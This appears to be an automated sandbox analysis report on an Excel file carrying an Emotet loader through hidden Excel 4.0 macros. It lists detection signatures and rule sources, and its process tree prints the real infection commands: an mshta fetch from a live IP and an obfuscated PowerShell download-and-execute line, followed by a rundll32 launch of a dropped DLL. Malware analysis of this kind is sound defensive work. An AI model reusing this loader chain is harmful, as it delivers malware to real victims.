Edit tour
Windows
Analysis Report
imedpub_8.xls
Overview
General Information
Detection
Hidden Macro 4.0 Emotet
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Sigma detected: Windows Shell File Write to Suspicious Folder
Sigma detected: Suspicious MSHTA Process Patterns
Document contains OLE streams with names of living off the land binaries
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Classification
- System is w7x64
- EXCEL.EXE (PID: 2092 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - cmd.exe (PID: 2968 cmdline:
CMD.EXE /c mshta htt p://91.240 .118.172/g g/ff/fe.ht ml MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - mshta.exe (PID: 2804 cmdline:
mshta http ://91.240. 118.172/gg /ff/fe.htm l MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 800 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noexit $c 1='({Fdrgg vdRf}{Fdrg gvdRf}Ne{F drggvdRf}{ FdrggvdRf} w{FdrggvdR f}-Obj{Fdr ggvdRf}ec{ FdrggvdRf} {FdrggvdRf }t N{Fdrgg vdRf}{Fdrg gvdRf}et{F drggvdRf}. W{FdrggvdR f}{Fdrggvd Rf}e'.repl ace('{Fdrg gvdRf}', ' '); $c4='b C{FdrggvdR f}li{Fdrgg vdRf}{Fdrg gvdRf}en{F drggvdRf}{ FdrggvdRf} t).D{Fdrgg vdRf}{Fdrg gvdRf}ow{F drggvdRf}{ FdrggvdRf} nl{Fdrggvd Rf}{Fdrggv dRf}{Fdrgg vdRf}o'.re place('{Fd rggvdRf}', ''); $c3= 'ad{Fdrggv dRf}{Fdrgg vdRf}St{Fd rggvdRf}ri n{FdrggvdR f}{Fdrggvd Rf}g{Fdrgg vdRf}(''ht {FdrggvdRf }tp{Fdrggv dRf}://91. 240.118.17 2/gg/ff/fe .png'')'.r eplace('{F drggvdRf}' , '');$JI= ($c1,$c4,$ c3 -Join ' ');I`E`X $ JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F) - cmd.exe (PID: 1256 cmdline:
"C:\Window s\system32 \cmd.exe" /c C:\Wind ows\SysWow 64\rundll3 2.exe C:\P rogramData \JooSee.dl l ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking |
---|
Source: | Snort IDS: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |